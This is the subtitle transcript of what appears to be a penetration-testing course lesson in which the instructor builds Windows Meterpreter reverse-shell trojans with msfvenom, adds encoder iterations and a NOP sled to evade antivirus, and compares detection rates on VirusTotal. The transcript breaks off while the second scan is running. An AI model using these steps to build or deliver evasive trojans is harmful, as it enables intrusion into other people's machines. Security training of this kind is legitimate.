1
00:00:00,300 --> 00:00:01,680
Instructor: Welcome back.

2
00:00:01,680 --> 00:00:04,050
Let's get back to our payload creation.

3
00:00:04,050 --> 00:00:06,270
So in the previous video we saw

4
00:00:06,270 --> 00:00:11,270
how we can create a simple dot exe Trojan using msfvenom.

5
00:00:11,850 --> 00:00:13,770
We used the basic options where

6
00:00:13,770 --> 00:00:16,860
we only set local host and local port.

7
00:00:16,860 --> 00:00:19,320
Now let's check out some other options

8
00:00:19,320 --> 00:00:20,673
that we have available.

9
00:00:21,540 --> 00:00:23,460
If I go and open up my terminal,

10
00:00:23,460 --> 00:00:26,913
and run the command msfvenom dash H,

11
00:00:28,590 --> 00:00:31,350
we will get our help manual.

12
00:00:31,350 --> 00:00:33,990
And the purpose of all of these other options

13
00:00:33,990 --> 00:00:36,150
that we can see right here will usually be

14
00:00:36,150 --> 00:00:39,330
to either bypass an antivirus or to make

15
00:00:39,330 --> 00:00:41,310
your payload smaller in size

16
00:00:41,310 --> 00:00:43,710
or something similar to that.

17
00:00:43,710 --> 00:00:44,850
Basically, it is used

18
00:00:44,850 --> 00:00:48,510
for creating a payload for your own needs.

19
00:00:48,510 --> 00:00:50,760
For example, in the previous video

20
00:00:50,760 --> 00:00:52,410
we created a payload that was

21
00:00:52,410 --> 00:00:56,250
a Windows Meterpreter shell as an exe file.

22
00:00:56,250 --> 00:01:00,150
But we can create other file types if we want.

23
00:01:00,150 --> 00:01:03,270
To check out what other file types we can create,

24
00:01:03,270 --> 00:01:08,070
we can run the command msfvenom dash dash list formats,

25
00:01:08,070 --> 00:01:11,760
and it tells us that right here under the dash F option,

26
00:01:11,760 --> 00:01:14,700
we can use dash dash list formats to list all

27
00:01:14,700 --> 00:01:15,810
of the available formats.

28
00:01:15,810 --> 00:01:18,390
So let's do that real quick.
29
00:01:18,390 --> 00:01:21,663
Dash dash, list and then formats.

30
00:01:22,620 --> 00:01:24,900
This will take a few seconds to execute

31
00:01:24,900 --> 00:01:27,900
and seeing this will be really useful.

32
00:01:27,900 --> 00:01:28,740
Why?

33
00:01:28,740 --> 00:01:30,900
Well, imagine you were sending a payload

34
00:01:30,900 --> 00:01:32,850
to a Linux machine.

35
00:01:32,850 --> 00:01:36,270
An exe file wouldn't be of much use then, right?

36
00:01:36,270 --> 00:01:40,650
However, a Python file could be of use in that case.

37
00:01:40,650 --> 00:01:44,070
Well, msfvenom allows us to create any file type

38
00:01:44,070 --> 00:01:45,570
that we want.

39
00:01:45,570 --> 00:01:48,630
So let's check out all of the available file types.

40
00:01:48,630 --> 00:01:52,680
So up here, we can see we can create asp, dll,

41
00:01:52,680 --> 00:01:56,160
exe, and some other file types as well.

42
00:01:56,160 --> 00:01:57,210
We can go down here,

43
00:01:57,210 --> 00:01:58,920
we can see different programming languages

44
00:01:58,920 --> 00:02:00,930
such as C, C#.

45
00:02:00,930 --> 00:02:04,800
We can create in Perl, in PowerShell, in Python.

46
00:02:04,800 --> 00:02:07,320
We can also do Ruby, sh

47
00:02:07,320 --> 00:02:10,710
and many other file formats if we want.

48
00:02:10,710 --> 00:02:12,180
And what I also want to show you

49
00:02:12,180 --> 00:02:15,930
besides this is different options that are also useful,

50
00:02:15,930 --> 00:02:18,240
whether it is for bypassing antivirus

51
00:02:18,240 --> 00:02:20,130
or changing the size of your payload.

52
00:02:20,130 --> 00:02:21,930
Let us check them out.

53
00:02:21,930 --> 00:02:23,160
So let's create a couple

54
00:02:23,160 --> 00:02:25,890
of payloads right now and compare them.

55
00:02:25,890 --> 00:02:27,450
Let me clear the screen first.

56
00:02:27,450 --> 00:02:28,770
And to compare them,

57
00:02:28,770 --> 00:02:31,383
we're going to use a site called VirusTotal.
58
00:02:32,850 --> 00:02:35,940
And to do that and to visit the site

59
00:02:35,940 --> 00:02:38,310
we must open Firefox.

60
00:02:38,310 --> 00:02:41,160
And what VirusTotal is, is a website

61
00:02:41,160 --> 00:02:43,560
where you upload your viruses and they will tell you

62
00:02:43,560 --> 00:02:46,740
how many antivirus vendors are able to detect it

63
00:02:46,740 --> 00:02:47,973
as a malicious program.

64
00:02:48,840 --> 00:02:53,840
So if I open VirusTotal by typing virustotal right here,

65
00:02:55,380 --> 00:02:59,850
go to the first link, which is this one, virustotal.com.

66
00:02:59,850 --> 00:03:04,110
And one thing to keep in mind is that every file you upload

67
00:03:04,110 --> 00:03:08,040
to this website is sent to the antivirus vendors.

68
00:03:08,040 --> 00:03:10,860
So something that might be undetectable today,

69
00:03:10,860 --> 00:03:13,470
after uploading it to this website,

70
00:03:13,470 --> 00:03:15,960
will for sure become detectable

71
00:03:15,960 --> 00:03:18,330
in a few days or a week.

72
00:03:18,330 --> 00:03:20,730
Are there other websites that don't send your files

73
00:03:20,730 --> 00:03:22,320
to antivirus vendors?

74
00:03:22,320 --> 00:03:24,693
Yes, but they are not as good as VirusTotal.

75
00:03:25,530 --> 00:03:28,020
And we already know that an undetectable virus

76
00:03:28,020 --> 00:03:30,330
is a game of cat and mouse.

77
00:03:30,330 --> 00:03:33,930
Today it's undetectable, tomorrow it isn't.

78
00:03:33,930 --> 00:03:37,530
So this isn't really something to worry about right now.

79
00:03:37,530 --> 00:03:40,770
Let's create two payloads real fast.

80
00:03:40,770 --> 00:03:42,750
So the first one that we are going to create is

81
00:03:42,750 --> 00:03:44,520
going to be the one from the previous video.

82
00:03:44,520 --> 00:03:45,660
So let's do it real fast,

83
00:03:45,660 --> 00:03:47,580
we already know how to do that.
84
00:03:47,580 --> 00:03:52,237
It will be a 64-bit payload, meterpreter reverse tcp,

85
00:03:53,220 --> 00:03:55,440
LHOST will be equal to the IP address.

86
00:03:55,440 --> 00:03:57,873
So let's check it out real quick.

87
00:04:00,270 --> 00:04:03,960
Dot one dot 12, and if I specify it right here,

88
00:04:03,960 --> 00:04:07,710
LPORT can be 5555, it doesn't really matter.

89
00:04:07,710 --> 00:04:10,650
The format will be exe and the output

90
00:04:10,650 --> 00:04:13,503
we can save as shell1 dot exe.

91
00:04:14,490 --> 00:04:15,363
Press enter.

92
00:04:16,230 --> 00:04:18,029
And as soon as this finishes,

93
00:04:18,029 --> 00:04:19,697
we are going to upload this payload

94
00:04:19,697 --> 00:04:22,079
to VirusTotal to see

95
00:04:22,079 --> 00:04:25,470
how many antiviruses detected it as a malicious program.

96
00:04:25,470 --> 00:04:26,520
So it has finished.

97
00:04:26,520 --> 00:04:28,650
Let us go to the VirusTotal website,

98
00:04:28,650 --> 00:04:30,600
click and choose a file,

99
00:04:30,600 --> 00:04:32,250
navigate to the desktop directory

100
00:04:32,250 --> 00:04:35,700
and select shell1 dot exe.

101
00:04:35,700 --> 00:04:37,140
I will double-click it.

102
00:04:37,140 --> 00:04:38,490
I will confirm the upload

103
00:04:38,490 --> 00:04:41,340
and it will upload the shell for me.

104
00:04:41,340 --> 00:04:44,040
Now this scan will take a minute or two.

105
00:04:44,040 --> 00:04:45,510
So while that is running,

106
00:04:45,510 --> 00:04:49,230
what we can do is we can create our second payload,

107
00:04:49,230 --> 00:04:50,760
and to create the second payload,

108
00:04:50,760 --> 00:04:54,150
we're going to use some additional options.

109
00:04:54,150 --> 00:04:56,430
So I'll clear the screen right here

110
00:04:56,430 --> 00:05:00,450
and I will type msfvenom dash H right here.

111
00:05:00,450 --> 00:05:02,970
So we have the help manual available.
112
00:05:02,970 --> 00:05:06,507
Then I will go right here and run the command msfvenom.

113
00:05:06,507 --> 00:05:08,040
We will use the same payload

114
00:05:08,040 --> 00:05:10,360
which is Windows x64 meterpreter

115
00:05:11,250 --> 00:05:13,443
slash reverse tcp.

116
00:05:14,400 --> 00:05:18,242
We will select the local host 192 dot 168

117
00:05:18,242 --> 00:05:22,920
dot 1 dot 12, local port will be 5555.

118
00:05:22,920 --> 00:05:25,260
After this, we can use the dash A option

119
00:05:25,260 --> 00:05:26,910
to select the payload architecture.

120
00:05:26,910 --> 00:05:29,700
As we can see right here, dash A stands for

121
00:05:29,700 --> 00:05:32,790
the architecture to use for the payload.

122
00:05:32,790 --> 00:05:35,130
So let's go and select x64

123
00:05:35,130 --> 00:05:37,110
because in my case, I'm attacking

124
00:05:37,110 --> 00:05:39,330
a Windows 10 64-bit machine.

125
00:05:39,330 --> 00:05:41,430
If your Windows machine is 32-bit,

126
00:05:41,430 --> 00:05:44,190
you can proceed with x86.

127
00:05:44,190 --> 00:05:46,530
Okay, the next thing that we are going

128
00:05:46,530 --> 00:05:50,760
to use is a very interesting thing and that is an encoder.

129
00:05:50,760 --> 00:05:52,560
And what is an encoder?

130
00:05:52,560 --> 00:05:55,590
Well, let's go right here and find the dash E option,

131
00:05:55,590 --> 00:05:57,300
which says right here the encoder.

132
00:05:57,300 --> 00:05:59,310
And what we need to specify after it

133
00:05:59,310 --> 00:06:01,620
is the encoder that we want to use.

134
00:06:01,620 --> 00:06:05,370
Encoders can help us bypass some of the antiviruses.

135
00:06:05,370 --> 00:06:07,620
To list all of the encoders that we have,

136
00:06:07,620 --> 00:06:10,200
we can use dash dash list encoders.

137
00:06:10,200 --> 00:06:11,400
So let's do that first.

138
00:06:11,400 --> 00:06:15,570
So msfvenom dash dash list,

139
00:06:15,570 --> 00:06:17,103
and then encoders.
140
00:06:19,530 --> 00:06:20,820
And here they are.

141
00:06:20,820 --> 00:06:22,050
We get a bunch of encoders

142
00:06:22,050 --> 00:06:25,500
for x86, or the 32-bit architecture.

143
00:06:25,500 --> 00:06:29,790
We get some for x64, or the 64-bit architecture.

144
00:06:29,790 --> 00:06:34,350
And we get some other encoders up here as well.

145
00:06:34,350 --> 00:06:35,880
Now the ones that we're interested in

146
00:06:35,880 --> 00:06:38,910
at the moment are these x64 ones.

147
00:06:38,910 --> 00:06:40,620
So we are going to go

148
00:06:40,620 --> 00:06:45,390
with this one, x64/zutto_dekiru.

149
00:06:45,390 --> 00:06:48,900
So let's copy its name right here

150
00:06:48,900 --> 00:06:52,533
and paste it after the dash E.

151
00:06:53,520 --> 00:06:56,220
Now, if we go back to the help manual

152
00:06:56,220 --> 00:06:58,350
and go back to the encoder,

153
00:06:58,350 --> 00:07:00,600
another option that is closely linked

154
00:07:00,600 --> 00:07:03,990
to the encoder is this dash I option.

155
00:07:03,990 --> 00:07:06,330
And it is the number of iterations.

156
00:07:06,330 --> 00:07:07,860
As it says in the description,

157
00:07:07,860 --> 00:07:11,490
this is the number of times to encode the payload.

158
00:07:11,490 --> 00:07:14,490
So if I go right here after selecting the encoder,

159
00:07:14,490 --> 00:07:17,700
we want to select dash I to specify the number

160
00:07:17,700 --> 00:07:21,000
of iterations that we want to encode our payload.

161
00:07:21,000 --> 00:07:23,970
Now, the more iterations, the bigger the payload

162
00:07:23,970 --> 00:07:26,850
will be in size, but it also might mean

163
00:07:26,850 --> 00:07:30,270
that it will be less detectable to the antivirus vendors.

164
00:07:30,270 --> 00:07:31,800
So let's specify dash I

165
00:07:31,800 --> 00:07:36,240
and then let's perform 15 iterations, for example.
166
00:07:36,240 --> 00:07:38,670
After it, we're going to specify the platform

167
00:07:38,670 --> 00:07:41,733
on which the payload will run, which is Windows.

168
00:07:42,660 --> 00:07:44,340
And after it, we are going to use the

169
00:07:44,340 --> 00:07:48,030
dash N option and select 500.

170
00:07:48,030 --> 00:07:50,250
Now to see what this dash N option is,

171
00:07:50,250 --> 00:07:51,840
we can go right here

172
00:07:51,840 --> 00:07:55,620
and in the dash N, we can see it is nopsled.

173
00:07:55,620 --> 00:07:59,700
It'll prepend a nopsled of [length] size onto the payload.

174
00:07:59,700 --> 00:08:01,450
Remember what a NOP is?

175
00:08:01,450 --> 00:08:02,700
A NOP is an instruction

176
00:08:02,700 --> 00:08:05,220
for the processor to not do anything.

177
00:08:05,220 --> 00:08:07,140
And here we are simply just telling it

178
00:08:07,140 --> 00:08:09,900
how many NOPs we want to add to our payload.

179
00:08:09,900 --> 00:08:11,940
Once we select a bunch of these options,

180
00:08:11,940 --> 00:08:15,330
we can add at the end dash F to be an exe,

181
00:08:15,330 --> 00:08:20,330
and dash O to be shell2 dot exe.

182
00:08:20,940 --> 00:08:22,890
So this is our second shell.

183
00:08:22,890 --> 00:08:26,160
Let's run it and wait for msfvenom to create our payload.

184
00:08:26,160 --> 00:08:27,750
And while it is creating the payload,

185
00:08:27,750 --> 00:08:29,370
let's go to VirusTotal

186
00:08:29,370 --> 00:08:32,549
and see how many detections we got

187
00:08:32,549 --> 00:08:34,650
with the regular meterpreter shell.

188
00:08:34,650 --> 00:08:39,360
So out of 68 antiviruses, 43 detected this

189
00:08:39,360 --> 00:08:42,270
as a malicious program, and here we can see

190
00:08:42,270 --> 00:08:45,030
which ones detected it as a malicious program

191
00:08:45,030 --> 00:08:46,863
and which ones didn't.
192
00:08:47,700 --> 00:08:48,803
Hmm, let's see

193
00:08:48,803 --> 00:08:53,640
whether we get any better result using the second shell.

194
00:08:53,640 --> 00:08:56,160
So we can see right here it has been created,

195
00:08:56,160 --> 00:09:00,510
successfully added NOP sled of size 500 from x64/simple.

196
00:09:00,510 --> 00:09:04,470
The final size of the exe file is 8,000 bytes.

197
00:09:04,470 --> 00:09:05,880
So let's go to VirusTotal.

198
00:09:05,880 --> 00:09:08,820
And remember this number, 43 out of 68.

199
00:09:08,820 --> 00:09:10,020
And let's see whether we can

200
00:09:10,020 --> 00:09:12,960
at least bypass a few more antiviruses

201
00:09:12,960 --> 00:09:14,970
than in this first scan.

202
00:09:14,970 --> 00:09:18,063
Let's select shell2 dot exe and confirm the upload.

203
00:09:19,020 --> 00:09:20,610
Now, while this is scanning,

204
00:09:20,610 --> 00:09:22,740
let me tell you something real quick.

205
00:09:22,740 --> 00:09:25,590
With the MSF options, don't expect to get

206
00:09:25,590 --> 00:09:29,130
much better results once applying some additional options

207
00:09:29,130 --> 00:09:30,450
or something like that.

208
00:09:30,450 --> 00:09:31,740
As I already mentioned,

209
00:09:31,740 --> 00:09:34,350
msfvenom is a really well-known tool

210
00:09:34,350 --> 00:09:37,410
and everyone uses these options to generate payloads.

211
00:09:37,410 --> 00:09:41,610
So they are very well known to all the antivirus vendors.

212
00:09:41,610 --> 00:09:43,860
Here we can see our second shell is scanning,

213
00:09:43,860 --> 00:09:47,553
and let's see whether we get a lower number than 43.